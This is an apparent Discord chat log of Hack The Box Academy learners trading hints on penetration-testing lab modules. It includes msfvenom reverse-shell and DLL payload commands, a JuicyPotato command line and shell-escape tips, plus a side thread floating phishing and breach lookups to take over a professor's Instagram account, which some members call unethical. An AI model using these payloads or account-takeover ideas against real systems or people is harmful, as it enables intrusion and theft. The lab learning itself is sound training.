#modules

No, that's what the Academy is for

Ok.. Do U Know Hacking

🤦‍♂️

Ok, go and learn, or don't. I'm going to get lunch

Bad One

he's pulling your leg. 🙂

Have you figured this? I'm having the same issue.
I tried ~1500 from rockyou via burp intruder but I didn't get the correct one.

https://dontasktoask.com/

I'm not entirely sure that's true 😅

But whatever, I've been wrong before 🙂

Many... many times

the question "I want to be hacker" is funny. Computer skills? Nop. Do I need it? 🙂

Could be a language barrier?

🤷 Anyway, looks like they went off to Academy, and hope they have fun and learn something in the process 🙂

Could be. But the profile smell funny.

👃

Bonus points for weird capitalisation and multiple question marks

oh that part is a bit dumb but you don't need a password for this any word will do

Hmm.. that didn't work for me. I tried the username for the previous question with the qwertyuiop password and got Invalid Login or password

the username you will need for this is the answer for question 1 but you don't need a valid password for that user

even though for RCE the that section said we need "a valid username and password"

Yep, that's exactly what I tried. I couldn't log in tho with qwertyuiop as password

i don't think qwertyuiop is the password for that user

I'm not sure I understand then. How do I log in?

oh you don't need to

all you need is a "valid username" not the password

Oh

Cool, let me try that

this is basically the example so not that much spoiler (wrong images the first time)

@echo zenith can I dm you?

yes

Got it. It's a bit dumb how it works.

Thank you

especially when the section have this

Exactly. That's what threw me off

Hey Truth, I'm having issues with this as well. Can you DM me the commands you used?

@hazy grotto what is the problem

No.

Hey everyone, I'm stuck on SQLmap essentials - Skills Assessment
I found the attack vector and my sqlmap displayed all the tables within the database however, I am unable to get the contents of the table with the flag.

Give the permission

You need to get RCE to read the flag

Hello! for the AD Enumeration skill assessment 1, can i get some help on how to get the cleartext credentials for another domain user? Thank you.

I'm stuck on Linux Local Privilege Escalation - Skills Assessment flag5 now and I need some help. I think that I should gain root but I don't how . use the busctl command that sudo -l give me? any suggestion guys?

@lyric mason have you tried https://gtfobins.github.io/

I did but I don't get it. busctl --show-machine !/bin/sh right?

upgrade to tty session before running it

you can use python for it

If you can't run sudo yet you'll have to do what 3dc0deR pointed out

Since the last time, i have now tried all given SYSTEM clsid's on the github and tried compiling my own binary as well for juicy potato. Still not getting anywhere. Any help would be much appreciated 🙂 (ref: windows privilege escalation part I)

I was unable to use the method described in this section as well, repeated the process a few times in case i missed something but no luck.. I'll try one of the other techniques now

for that DnsAdmins section i can load and run the dll but not as a rev shell but i can make that dll file run a rev shell
msfvenom -p windows/x64/exec cmd='C:\Users\netadm\reverse.exe' -f dll -o sussy.dll

Using the first CLSID from here https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard worked fine for me with juicypotato

for that you can use the test_clsid.bat script on that tool github with the CLSID.list and it will test with 500+ CLSid

trying this right now. seems to output 10000, 10001, 10002 and 10003 next to the CLSIDs. trying with one CLSID from each group didn't get me the shell.

Just to rule out the obvious, would it matter if I am using powershell instead of cmd? And does this format of running the payload look correct .\juicypotato.exe -t * -p "C:\users\public\rev.exe" -l 1337 -c "0C3B05FB-3498-40C3-9C03-4B22D735550C"? I have verified that rev.exe works well on it's own to give me a reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=1337 -f dll > benign.dll works also

yep it did yep it crash for me after 2 sec so the auto migrate didn't have a chance to run

for the CLSIDs i also have {} thing but not sure if that matter or not and i think you should be find on either powershell or cmd and after the test script done it should output a list of usable CLSIDs named result.log

for the CLSIDs in result.log only a few one doesn't work for me but just for sure i copy and use every one of them but you 100% don't need to do this

it's starting to come together a bit. got result.log and that had the first clsid from the github link as well. switched to cmd, just in case. and now the target timedout. brb.

yes you can dm

got it! thank you so much @vital adder and @slim plover!

hello, i am working on the academy module, "Laudanum, One Webshell To Rule Them All" and am stuck on questions 2, "Establish a web shell session with the target using the concepts covered in this section. Submit the full path of the directory you land in. (Format: c:\path\you\land\in)". i have followed all the proper directions but when i try to navigate to the imported config file for the webshell, i get a server error. can someone help me figure out what i am doing wrong?

which module are on?

Shells & Payloads

sorry for the delay my note was kinda F for this so i have to give that a check but what exactly is the issue? if you white list your ip in the payload and upload that payload you should just get RCE

also this payload will give you a cmd shell you for the directory use dir

no problem on the delay! and i am at the part where i upload the webshell and get the output url to access the webshell. so when i use that url to get to the cmd shell, i get a runtime error

also i did whitelist my ip

and what url are you trying to access the payload in?

should i blur the url?

yep

||status.inlanefreight.local\files\demo.aspx||

and you still don't know why you have that issue? \ is only for windows directory use / on the web

so i did try that as well and i got the same error

I used url//files/demo.aspx

tried that as well

with double /?

yup

try with 1 /

ok one moment

if that still doesn't work restart the target machine

tried both ||http://status.inlanefreight.local/files/demo.aspx|| and|| http://status.inlanefreight.local//files/demo.aspx|| and still received same error

Stupid question, the file you uploaded did you rename it to demo.aspx?

yes, just to be on par with the instructions

under section: Move a copy for Modification

Can you send a screenshot of the error you're getting + did you add your 10.xx.xx.xx ip?

If that doesn't work you can try to upload the file again under a different name

sure thing. one moment while i take screen shot. and yes, i added my ip in the allowedips section

And if that doesn't work you should indeed just reset the target

pm'ed you the screenshot @unreal patio

and ok i can try to reset the target if it doesnt work

Hi, could you give me a nudge on the Shells&Payloads Skills Assessment Host 1? I got all other tasks done, apart from the host 1. I can upload a war file, but whenever I visit a uploaded java payload, I get 500 error and runtime exception :/

@high totem Did you try with an .aspx shell?

No, but you mean package aspx shell into a war file?

Just upload an *.aspx shell directly and browse to it

@high totem i am running into a runtime error as well in that module. i even tried to reset the target with no luck. @unreal patio , i am assuming that module is being a little buggy if others are running into similar issues?

I redid both modules as you two ran into the errors and it worked fine for me

hmm odd, must be user errors then..lol

Wait, tomcat doesn’t accept files other than war. Or is there some other exploit to use?

@high totem if you cat /etc/hosts you'll see there is a vhost you can use

ok, got it. Thank you. However right now I don't know which folder the authors wanted. There are a few in C:\Shares 😄

(Format: all lower case)

So it said for the hostname, but it was in capital letters 😄

Stuck on Attacking Common Applications - Skills Assessment I. I got the first 3 questions, but not the 4th.
I have found a vulnerability that allows RCE, but can't read the flag. I can see it with ||dir+\users\administrator\desktop\flag.txt||, but can't read it with type.

Edit: solved! Thanks a lot to @vital adder

Hint: ||note that this is a BLIND command execution||

Hint2: ||not many common system commands and binaries are available. If what you're trying to do doesn't work, try to use another command/binary||

so this part is a bit new to me but you can actually run all command with that vuln but only ||(so far i found 2)|| command will be output but the rest will still run so can still get a rev shell and get the flag but i didn't do that the first time if you found the other command you cat just "get" the flag

The commands look like they're not running for me. I tried to ||download and run a shell with powershell||, but it didn't work

Can I dm you?

sure

can someone help me with the dcsync attack for the AD Enumeration & Attacks - Skills Assessment Part I? thank you

Hello,

I am having an issue with my nmap scan on the Starting Point Tier 1 "Responder". My nmap scan does not return the same ports that are shown in the walkthrough; my scan only returns port 80. This is with the same flags used inside the walkthrough "nmap --min-rate 5000 -sV -p- <host> -o <filelocation>. Any help would be greatly appreciated.

This last question in the DNS footprinting module is driving me insane. I've found FQNDs all the way out to the ns.dev.inlanefreight.htb. Anyone have any insights into this impossible scenario?

@waxen barnwhat is the problem

@waxen barn Iirc you're supposed to migrate the dev.inlanefreight.htb and it's one of its vhosts..

I've tried the dev.inlanefreight.htb with the IP address provided for the lesson. Is there a different IP I'm supposed to use?

I've tried the dev.inlanefreight.htb with the IP address provided for the lesson. Is there a different IP I'm supposed to use?

@waxen barn try to brute force the subdomain

I did that with dnsenum.

@waxen barn What command did you use to get ns.dev.inlanefreight.htb?

Did you bruteforce it? or with a transfer?

Brute force w/ the dnsenum tool’s list; IP as provided by HTB to connect w/; dev.inlanefreight.htb. I got ns and mail1 for the subs to .dev

Then you're on the right track

Just the wrong wordlist 😛

/opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt

Try with that one

Thanks!

It worked! Holy shit, what a headbanger. I’ll never forget DNS enumeration now though, which I guess is part of the point they’re trying to get us to with exercises like this.

Yep that is one of the major values in it all being challenge-based. You actually will remember and develop tangible skills. But there will certainly be struggling and growing pains 🙂

Hello all,

Currently having some trouble with the module Password Attacks - Credential Hunting in Linux. "Examine the target and find out the password of the user Will. Then, submit the password as the answer"

Is the first step to discover Kira's credentials? I have created a mutated list with the LoveYou1 pass included in the hint. I've tried running crackmapexec with the mutated list against Kira's username but receiving no so results. The hint has me a little confused. Should be be making a mutated list out of the hint pass or the password.list included in the resources?

Kira with a mut_password of LoveYou1 should get you in

Will give it a shot, thanks for the tip!

Does it matter which custom.rule or best64.rule to use for the mutation?

custom.rule from the hashcat rule file in Password Mutations should do it

Finally found Will's password in Credential Hunting in Linux. That sure was a grind. Not too bad in hindsight. Let me know if anyone needs guidance

anybody working on footprinting module. I am on smb footprinting and I am a bit stuck.

I need to findout physical path for particular share. I expect to use rpclient but I cannot access it due NT_STATUS_NOT_FOUND

I tried to use enum4linux with debug param to check the calls but no successful to retrieve that information. I almost pretty sure that this tool is the suitable tool. But something is wrong.

anybody can help me? I read man page but I don't find what I need and - to be honest - some explanation are beyond my knowledge.

@zenith schooner What paths have you tried so far?

I'd suggest you read this forum post https://forum.hackthebox.com/t/what-is-the-full-system-path-of-smb-share-footprinting-academy/257393/18

If you're still stuck ping me

hello, anyone that can give some help with Firewall and IDS/IPS Evasion - Medium Lab. its driving me nuts

hint ||protocol||

pls don't share that also if you need help with anything you can just ask here

okay thanks

also that email is Pwned in 3 data breaches

so if you haven't change your password pls do that and you can check what data breaches your email is in on haveibeenpwned.com

also if you can't tell like the last guy that ask how to hack google and also have this issue i'm trying help

hello i am having challenges answering this question

here is it; What is the path to htb-student's home directory?

if you are having issue need help with anything in the academy pls add which module and section (even question) you are stuck on

also that look like you need connect to a target machine or it is on the pwnbox

yes whats the command to get the path to htb-students home directory

it was not a "read man" situation. I tried pwnbox and rpcclient works as expected. For any unknown reason, my rpcclient on my kali doesn't work (No tcp/ip traffic was detected by tcpdump). Maybe a smb.conf issue. Thanks anyway

so which module is this? also if you are on the pwnbox then you are the htb-students user or if you are connected to a target machine most likely you still are the htb-students user so run pwd to list your current directory and ~/ is short for your home directory so run: pwd ~/

i am in page 5 system infomation linux fundamentals

okay thank you i will run this and get back to you

@zenith schooner did u check ur vpn connection

What is the path to the htb-student's mail?

use this

👍

Any hints?

i tried pwd~ and the answer was wrong

and this is the answer i get /home/htb-ac638407

What is the path to htb-student's home directory? anyone pls i am stuck

what happens when some gets stuck and cant answer a question in the modulues

i need mentorship or help i am new

to htb

@supple cape I would look in the module to see if there are any further modules or resources you can do to try and learn a little more about the subject before tackling the assessment

If you are really stuck then take a step back and try to learn some more fundamentals. It's a marathon not a sprint so don't sweat it, everybody gets stuck and everybody started out knowing nothing.

i have been here for about 2 days. just look at the question page 5 system information. i have tried pwd ~ and it keeps failing i need a mentor. pls look at page 5 system info question 2

i will really appreciate it

@supple cape Google is your best friend, I'm sure someone has been stuck running the same command before

tried google and still dont seem to get the right answer still

nobody seems to know it

and funny enough it has no cubes attached to it the question

@supple capeAre you on the pwnbox still or have you SSH'd into the given IP address. Just took a look at the question and judging from the output you're getting, you're still in the pwnbox.

i have figured it out now

how do i switch from the pwnbox

i just got done with some stuff and for this command you can't run just pwd ~ you need to run pwd ~/ becuase without the / it isn't a directory hence the error

The last section of the page you're on has info on how to use SSH. Make sure you're connected to the Academy VPN.

thats true i just found out

also the question need a home directory of a user (in this case for the htb-student user) if you google for that user home directory you will most likely get nothing you have to google something like how to get linux user home directory

edit: i try google that for the first time and the first link show a great article about this: https://www.linuxshelltips.com/find-user-home-directory-linux/

Also, does anyone know if there's a way to bypass a blacklisted dollar sign character? I'm on a box where I think I need to bypass an underscore, for which I'm using ${LANG:2:1}, but turns out the dollar sign is blacklisted as well.

Ya been a while since I did this module but I remember the commands given in the cheat sheet did not work for me I used the command syntax from this page if I remember correctly and these worked for me https://www.atmail.com/blog/imap-101-manual-imap-sessions/

Module- password attacks section- Linux pass the ticket

SSH to <I.P> with user "david@inlanefreight.htb" and password "Password2"

Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory.

I cant seem to login with ssh I suspect may just be some command syntax error but the standard ssh format of user@<I.P>:<port> doesnt seem to work. Tried putting the user in quotes and a few other ssh switchers like

ssh -l 'david@inlanefreight.htb' -W '10.129.89.17:2222'

ssh david@inlanefreight.htb@10.129.89.17:2222

ssh -J david@10.129.89.17:2222

ssh -J "david@inlanefreight.htb"@10.129.89.17:2222

none seem to work

Footprinting - Medium Lab: There is no "HTB User" in database nor locally. What are they talking about??

I believe it's ssh <USER>@<IP> -p <PORT>

One question, if I am connected remotely, how can I go back without disconnecting from the remote connection?

/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
^[
^[
^C
[us-academy-1]─[10.10.14.113]─[htb-ac630938@htb-qj2d5jsi4f]─[~]
[★]$

I press ctrl+z and I disconnect to where I had connected, when what I wanted was to go back

@forest tapir Enumerate the databases. You should see a database with a users table

I'm almost certain ive looked. there but I'll look over once more

i just started expanding everything at one point in desperation
i cannot find it

@chilly nymph Doing CTR+Z backgrounds the process. You should then do stty raw -echo; fg. The stty raw -echo will send your input raw to the terminal and the -echo will prevent it from showing you double output. The fg then returns the backgrounded process back to the foreground, letting you interact with your shell again

ohh ty ñ.ñ

I'll write it down

Yeah, there is no "HTB" user:

I've expanded everything.

I'm not expanding "System Stored Procedures". It's becoming ridiculous.

The Select * from master.sys.database_principals was supposed to dump all users anyway, according to microsoft

I don't know wtf they're talking about....

I've gutted this thing. I'm looking through "schemas" at this point...

I've resorted to randomly clicking shit. Idk what else to do.

Is it a shared instance and someone removed it

a what?

Where you dumped that db from

If it's from an academy module on a machine that is shared between users

And someone did a little joke on you

I dunno haven't done that module but I feel like you should easily find it if you have dumped it all

I thought the machine changed on restart.

I don't know how htb manages these machines.

Like, it spins up a new EC2 right?

or whatever they use

But of it's like boxes on free tier you might be sharing it

No clue just a guess

I'm not sure that "Footprinting" is free or not. No idea.

Would it matter if it was paid?

Tier 0 are considered free, but regardless and especially if it is an ec2 instance it might not be a personal one

That costs money

Again just a guess on my part

Since it shouldn't be some dark arts to find a user

Nah, it's Tier 2

Hmm weird

That's wha t I'm saying man...

woman, w/e... lol. I'm pissed rn.

I dunno if I have the time today but I'll try and look into it if no-one has the answer for you in the meantime

Lul, idc don't worry (but as professor oak would say, I'm a boy)

Tier 1 boxes and up are private?

I...

It's THM all over again lul

Busted boxes

Worst case scenario open a ticket, but as we're Saturday I don't think you'll find a staff though

It's okay... I guess I'll have to wait.

There is no goddamn Pepe Silvia... Half the people in this office have been made up

hello every one

@forest tapir What are the credentials for the machine for the medium lab?

I solved it some time ago but I forgot the credentials want to see if I can get the htb user out

hang on

I'll. dm

got to spin up my VM first

idk why i can't dm you in browser...

I dm'd you, can you read me?

if you finished it then it can't be broken, can it?

I'm waiting for the you're stupid, i found it response

Hey I was wondering if I could get some help with an issue I am having

I am not a cyber security expert at all I am a machine learning guy but my professor said if we can hack his fake social media account we get extra credit. My grades are awful right now and can use any assistance.

Please dm me if anyone can be of assistance

I don't think extra credit works that way, unless you have some sort of idea what you're doing and just need hints.

He is a weird guy literally the dude said it would give us extra credit on our mid term and I was baffled that he’d want us to do that…no like I’ve literally never hacked a day in my life I’m studying data science and this is my class on building neural networks.

Sooo yeah this is way out of my ball park

He said something about using brute force and I’m so naive to this part of CS.

i don't think anyone would do it for you. it's unethical.

I figured and that’s what I thought myself I was like he wants us to break the law for extra credit

it's not really breaking the law if he's allowed it (and fake) but solving the riddle for you would be "cheating", therefore unethical

Oh yeah I’m not asking for anyone to do it for me but any pointers on where to start would be helpful like steps or anything everything I’m finding online is fake Instagram hacking apps

What kinda blog and login is it?

There are just too many ways of approaching it without intel

And bruteforce.. is well.. bruteish

It’s just a regular old Instagram account

brute forcing is pretty simple

So he's asking his class to attack the instagram server?

Kinda sus

but you would have to learn the tools first

Dude I know I was like this man is getting us all sent to jail for 30 extra points

HTB is about ethical hacking, so I doubt you'll find people over here that are going to try to breach servers where we have no permission to pentest on

he might have spun up a mock social media page he made himself/snagged from GitHub

who knows

That'd be a different story

you can't brute force insta anyway

I mean I found the page on Instagram

they have teams of security experts

oh...

Yeah so does he want us to send an email to his personal email pretending to be Instagram and get his login info

He said he made a fake email with it as well

Would it be easier to get into the gmail account and reset the password

maybe

would he really be that tenuous?

Has he given you an url to attack?

Could I find the password in the elements ?

noooo lol

you're not going to break into Instagram trust me

maybe he does mean "phishing" i dunno

It's starting to sound like you have a grudge against someone on instagram and are just spinning a narrative..

those are some strong words

I truly wish I had a social life to have a grudge

Lol

Yeah I’m at a lose with this one so this task is basically impossible right

Loss**

what kind of class is this?

It’s a machine learning class for basic algos

huh...

hmm

Yeah I know

idk, send him an email

try to be crafty

This is so sus 🤣

if that's his angle

Probably is

I know dude I feel like a creep right now asking this lol

You're not giving us any info to work with either

Maybe you should try another channel seeing this is for academy modules

"teacher: hack this thing"

okay teech lol

wdym

I appreciate it anyways guys have a good night I’ll do some more googling

I wouldn't do anything unless you can confirm firstly that the account belongs to the teacher & he wants you to attack via a phish and not trying to 'hack instagram' which, you wouldn't be able to do and would land you in hot water

@pulsar coral use his email to see if his password was breached

@placid quest what does that mean lol

I have never hacked before in my life lol

If he has just created the email then this wont work.

My guess is that he wants you to create a fishing email

if I really had to guess

How do I create a fishing email ?

because you're not breaking into Instagram. end of story lol, So he must have a different angle

you'll have to figure that one out

Okay fair

@pulsar coral it means that sometimes his email and password was breached and he did not change the password which may provide easy win

The email he gave you is a new email just for this task?

Just steal his laptop and dump all passwords (?)

Yooooooo

@stuck hull it may work since most people don't know that their password was breached

@unreal patio you are wild man lol

@stuck hull it’s an gmail he made to sign up for this account I asked a few of students that had him before if he used the same information but they said he always makes a new Gmail and insta account

phishing requires a certain level of creativity/ conniving

@pulsar coral use dehashed to see if his password was breached first before u go with brute forcing

bruteforcing Instagram would get the account locked out

also, yes

maybe, i dunno what this is with "bruteforcing" though or why he said that

What's on the instagram account?

It sound's either like you need to send a phishing email or this is some kind of puzzle.

Hi ! I am on AD Enumeration & Attacks - Skills Assessment Part I
Managed to get shell using PS remote with the SQL user but I can't find the user clean text passwords. I tried mimikatz and lazagne but only got the hashes

can you submit your own passwords to dehashed/haveibeenpwned??

would they accept that?

maybe that's what he did and Crean is on to something...

He literally wants us to get into the account and send him a picture of the only photo on the account it’s private and he won’t accept my friend request

I will give all of this a try

he either A: doesn't understand how security works. B: is being "obtuse" with his instructions, on purpose or C: this is a lie.

js, those are the possibilities

And unless he is just going to email you the password in clear text, you'll have to create a webpage for the phish to be effective - how can he assume ML CS students know how to do that?

It just doesn't make sense

right. it's a bit complicated for a newbie. it's a bit of a task even for experienced pentesters/hackers

unless he just wants you to throw up a quick php page "and just pretend it's pro h4ckzor" and he just wants to see you thinking creatively...

maybe

if i was a teacher, that's what i would want

but it's still a bit of a task, regardless

can i dm someone for Footprinting Lab - Medium?

yup

Well I better get to work this is going to be a longer day than I thought

me or @unreal patio

Anyone hiring for ML and data scientist that don’t want to finish school ?

Lol

heh...

Honestly, it seems like a major distraction from the non-trivial task of learning Machine Learning

bin the idea and focus on your course is my advice

Yeah honestly what I’m going to do this whole project seemed like a waste of time to make I’m just going to ask my roommate in the morning if he figured it out thanks again everyone

Have you tried putting the hashes through Crackstation?

Oh, they'll be salted won't they? nvm

yeh

Wouldn't pass the hash work regardless?

Unless the cleartxt password is a flag

perhaps if it's permitted

i do think he mentioned "clear text" which i dunno, I'd have to see what's going on with my eyeballs

👀

golden ticket

perse deh hersh

ermegerd

Yeah the flag is the clear text password :/

I actually finished the lab

Only this flag is missing

the flag is usually plain text..

crackstation is your friend

password or flag?? I'm a bit confused

The cleartext password is the flag

oh right

sounds like mimikatz

Wait you need to be NT in order to dump hashes, right??

I am

hmmm

unless it's something dumb like a file laying in the open, i'm not sure

i've had katz not elevate correctly as a low-priv user before, so that's also possible.

like, sometimes it's finicky at least for me.

maybe i'm just a dum-dum idk

In module Password Attacks - PTT
I'm not allowed to use xfreerdp with .\Administrator as user

Anyone a clue?

hi

administrator as user?

what's ur error msg?

xfree was goofy for me b4, did u try remmina?

idk why

remmina also being goofy

nvm

I'm in

gg

lol lemme guess

• the .\?

I put . as domain in remmina

Hii friends

Hlo

Hi anyone can tell me my answer

Anybody is daring to give my answer

Weapon of every Hacker

@rustic sage what is the problem

Weapon of every Hacker?
What is Red linux

This question

🤦‍♂️

Hi all, I'm stuck on the "Network Enumeration with Nmap" module, Nmap Scripting Engine section. I've enumerated the ports and ran the 'vuln' script.

It came back with the slow-loris attack, which isn't helpful in this case, the http enum found a robots.txt which looks like it has the flag in it, but won't work when I input it on the site. Any help?

Windows Privilege Escalation: Interacting with Users the hint says ||"Look for interesting shares that are writable by our user."|| but there's only 4 shares, 2 of which are "NO ACCESS" and other 2 are "READ ONLY" 🤔

@stuck hull
A robots.txt file tells search engine crawlers which URLs the crawler can access on your site.

It's a file that is hosted on the webserver

Thanks Niux. I did try just navigating to a url with the contents of the HTB{} but nothing came back.

This is what I'm seeing

that should be the flag i think.. did you try to submit the whole string, with no whitespace?

Under Allow you got your flag

Yea, I tried that but it didn't work.

Just copy the entire thing

with HTB

Let me make sure

Oh ffs

thanks all

😛

I've removed the photo for spoilers

where can i find users and passwords in microsoft sql server management

i hate this gui things and microsoft also

What module are you working on?

Footprinting Lab - Medium

You have to look for the htb user?

i logged in as admin.but i can not find user HTB and pass

yes

select * from dbo.devsacc where name = 'htb';

Might be too much of a spoiler though

😓

where can i search with this query?

mssql server management

There should be a button for queries

let me see

it says invalid object 😦

select * from accounts where name = 'htb';

And that one?

Strange because I filled in the previous one earlier today and I got the answer

execute but show me nothing

Let me boot up the machine again

select * from accounts.dbo.devsacc where name = 'htb';

Try like that

@sly grotto it worked for me 😐

it worked.thanks .but how could i now that?

any cheatsheet for mssql?

I got the clue that it wasn't part of the default databases

select * from sys.databases where name not in ('master', 'tempdb', 'model', 'msdb');

So with that command you get the accounts database

And then you enumerate that one

i can't understand this one?
accounts.dbo.devsacc

If you rightclick some files you the option of 'edit top 200' which is a clue in the module

So if you enumerate all that you can edit the top 200 with with a query

you end up getting a hit for htb

In the database accounts there is dbo.devsacc and that is the right file

thank you for your help bro

anyone for web attacks module? XXE Blind Data Exfiltration, just struggling with payload

I have to check it but I don't think so because nmap and smbclient worked. But rpcclient no traffic was generated. I have to check config or a fresh installation. thanks

@zenith schooner a u still stuck

what channel

is for hack talking

I need some advice on what tools I should really study

and get a firm understanding of

Hi

I'm... new here

what to do?

Just make an academy account and start doing the fundamental modules

It's a good place to start

ayo

what

channel

should i ask that in

You could start with nmap

already know it

and its a bit trivial

in actual domain hacking

especially when you can use metasploit instead

this is what im saying i dont wanna learn 10 tools when theres 1 that can do all of them in one

Wireshark and burp are also good ones

okay it is about time that I look into wireshark

you think learning lua is worth for wireshark and NSE scripts

ehh

ill figure it out

Hey, question regarding metasploit module, sessions section. I cannot get the elevated permissions. Got the shell, dropped it into background, run local_exploit_suggester to find some exploits and found two. Both say they are completed, but no session was created. Any hints on why this might be? lhost is set to tun0 and lport to 4444 (same as in the first exploit, which is now in session)

Hi, I'm trying to use Impacket's secretsdump script for the password attacks module but running the script produces no output, has anybody encountered this problem before?

@high totem did you specify the right session for the exploits?

Think so. Took the id from the sessions command. Using this id I am able to jump back into the non-elevated shell

You could try to put in your ip by hand instead of tun0

I have had cases where specifying tun0 wasnt enough

try changing lport, maybe the 2 shells are in conflict since you're trying to run them on the same port

@pliant sage which section of password attacks are you in?

attacking SAM

I've retireved the .save files, but when i run impacket I don"t get any output

not even an error message

Changed to 4449 but it didn't help

Unfortunately it didn't help :/

@pliant sage I just used cme there

can you screen the options of the exploit you're using? after setting them

Didn't know I could, was just trying to follow the lessons instruction. I'll give cme a whirl

I used samdump2, worked like a charm

I once ran an exploit twice in a row with no result spend ages breaking my brain just to run it a 3rd time and it to work

Your options seem alright

I mean you could try to see if with your current shell you can write files to /tmp but I doubt that's it

/tmp permissions are 0777 :/

I mean, the only thing that bothers me here is that I cannot mark the module as finished because of that. And it is needed for the penetration tester path :/

anyone hack valo or rblx

I run it many times though, with the same result :/

@high totem try to reset the machine and see if the problem persists(?)

or kill the session make a 3rd sesion and try with that

Tried that. It does... I really feel like I tried everything 😛

i didn't use pwnkit for this also i think exploit suggester did give ||CVE-2021-3156|| so try that

MRtom to the rescue! It worked. Thank you. 🙂
However I checked, and exploit suggester did not even try that, so it wasn't suggested

oh that's weird pretty sure i use exploit suggester for this but right now i'm on the enterprise network module so i'll double check that in a bit

@brazen apex Wireshark is not used in hacking but it is analysis tool used to inspect packets on the network

so i just double check some stuff in that section and when running exploit suggester if you run it against a x86 session you will get a completely different set of exploit then a x64 session

so a x86 session only give me ||3|| exploit but the x64 session give me ||6|| (also i try ||pwnbit || manually and this target doesn't seem to be vulnerable)

Ok, so I guess I used the x86 arch (which must have been set as default, as I didn't specify any). I still wonder why any of the exploits I have found didn't create a connection. msfconsole said all of them were successful

yep that's the default

no idea but i have that issue lot

Something to be aware for the future then. Thanks

I connected to pwnbox and I solved. It was easy. Now I want to figuere out why my rpcclient works wrong. 🙂 thnaks

@zenith schooner sometimes -N is the problem

General Question: I'm working my way through the 'Firewall and IDS/IPS Evasion' section or Network Enumeration with Nmap. It talks about how IDS and IPS are more difficult to detect on a real pen test and we have to use multiple VPS services. Does it mean things like AWS, Azure & Vultr?

Also, a bad actor wouldn't be able to use those services because when a company inquired their names would be attached to the service - so how do they go about using a VPS?

Any help for a noob?

@cyan saffron what is the problem

im stuck no the question TASK 5

From your scans, what version is FTP running on the target?

how can i know if i can't connet on the target machine?

@cyan saffron did u use nmap to scan the ip address using -v option

no

So scan the ip address using nmap to get the answer

ok

tks

@cyan saffron u can use nmap -p21 -sV -v ip address

Quick question to Password Attacks module. In the introduction it is stated

could require all three types [of authentication] (A CAC [a card], password, and pin from an authenticator app, for example)
Isn't pin from authenticator app same factor as a card? I.e something you have? Or same as password, i.e. something you know. But I don't get how it should be the third one - something you are

Would like to make $500 faster than any other job dm me

How do you report spam on discord?

Dm me

bad actors absolutely can still use vps services. 1. They're criminals, they have no qualms about using stolen identities. 2. Not all VPS providers care or check, some have been known to actively turn a blind eye to malicious actors 3. Some vps providers straight up allow anonymous payment with bitcoin.

Spent considerable time trying to enable windows subsystem for linux in my Windows 11 VM. I think the problem is that I have to enable virtualization in the bios, but it frustrates me because I can't find any virtualization settings in the bios... Any advice?

if you dont have any virtualization settings in your bios you may literally be running a cpu that doesnt support it

I am trying to enable virtualization in a windows VM that is running on my host.

ah virtualization inside of virtualization definitely gets funky, idk how doable it is

Windows subsystem for Linux is supposed to be doable, maybe missed a detail somewhere

can someone help me. im doing the attacking common services easy section, but i cant seem to find a user name. i tried the user name list in resources and tried to auth to rdp, ftp, and the mail with no hits

Stop your ACTIVE machine to change access

where do i check for my active machines?

Error!

You must stop your active machine before spawning another one.

Can I have a hint on resolving "The Live Engagement" section on module "Shells & Payloads"? Im finding it non-sense at all...

i think i just found it

@autumn garnet may enumerate port 25

Hi crean! its good to see you, i think i just found it using a user name list in seclist. also thanks for your help that you gave me last time

@autumn garnet ok

Someone around here?

Hi

@near night hei

@rustic sage What is the problem?

Anyone able to give me a hand getting the Nginx and Apache Reverse Proxy to work with AJP? I'm following the steps in the Server Side Attacks module but my Nginx/Apache instances always fail to connect 😦

hi everyone! Im doing the Web Servce & API skills assesment. I have DB access, but cant find the admin password. Kinda confused lol

if anyone can advise I would be forever in your debt

🙂

also grepped through all the node js modules and didnt find anything

wdym have DB access? also hint when you send the right payload to the target machine you will get the admin cred but the target machine only respond if you send the right payload (like the question said)

shoot me a dm if you still need help with that

so just double check all 3 after the lab updated and all 3 seem to be working fine now but the vector hint for the first target is a dumb

Ahh thanks mate! I gave up trying to debug my VM, it worked on the Pwnbox 😄

I just don't like using the Pwnbox, it's so laggy for me. Probably cause I'm connecting from Australia :/

yea the pwnbox is a bit laggy but congratz though

Sorry for the oh so late reply but thank you for your help @iron basin

I'm working on the footprinting module SNMP. I ran the SNMPwalk and it wouldn't allow me to scroll very far up in the results. Just stops scrolling at a certain point. Is there something i can do for this?

You could pipe the output via more, e.g. <command> | more, or pipe it out to a file, e.g. <command> | tee -a <file>

Treating outputs as data and programs as processors using pipes is a good skill to have - Linux is nice in that respect, distinct commands with very specific purposes. Combining them can help you achieve many things.

snmpwalk -v2c -c public 10.129.112.42

This is the command i need to run so would it be

snmpwalk -v2c -c public 10.129.112.42 | more

That's right - the command will run and the output shown until it overruns the terminal space.. then you can hit space to continue

I got a root shell and just dropped into the db lol. the creds werent there though :(.

Thank you for teaching me something new.

You're welcome 🙂

is there anyone I can dm about the skills assesment for webservice and api skill assessment?

Does anyone know any hacking courses to do?

academy has alot...

https://academy.hackthebox.com/

thanks

np

there are learning paths you can follow

they will recommend courses to take

ok thank you, very much but are the courses in the form of videos and exercises?

they are in text, but have interactive exercises you can complete either by joining the VPN or using Pwnbox from your browser

I learn better by practicing, so the interactive exercises help me alot

some of the exercises are also pretty awesome. I really enjoy the active directory module labs. They simulate a realistic pentest

easily one of the best learning resources out there imo

I also learn better by practicing, but I'll check here and let you know

sounds like HTB academy is for you 🙂

is this part of Pwnbox free?

yep

it is a network joined parrot os box

that you can access through your browser

ok , thannks

there are alot of introductory modules I think for free

you can try it out and see if it is for you

you just have to make an account

do you already study hacking or do you only do it in your free time?

I have a few certifications and am working on more before seeking employment

got the CRTO OSCP and Pentest+

I've already done some things in the courses, but I learn a part better by watching video too

academy has content for everyone

from beginner to professional

there are pictures in the modules

so I dont think video is necessary

they have screenshots that walk you through the module

and commands issued

I understand, I'll follow what you said, thanks

on another note, does anyone know if I can use sqlmap for the web service & api attacks skills assesment? I thought sqlmap fuzzes the parameters of the XML file, but I can't get it to work

the problem is that i have to translate, because i don't speak english

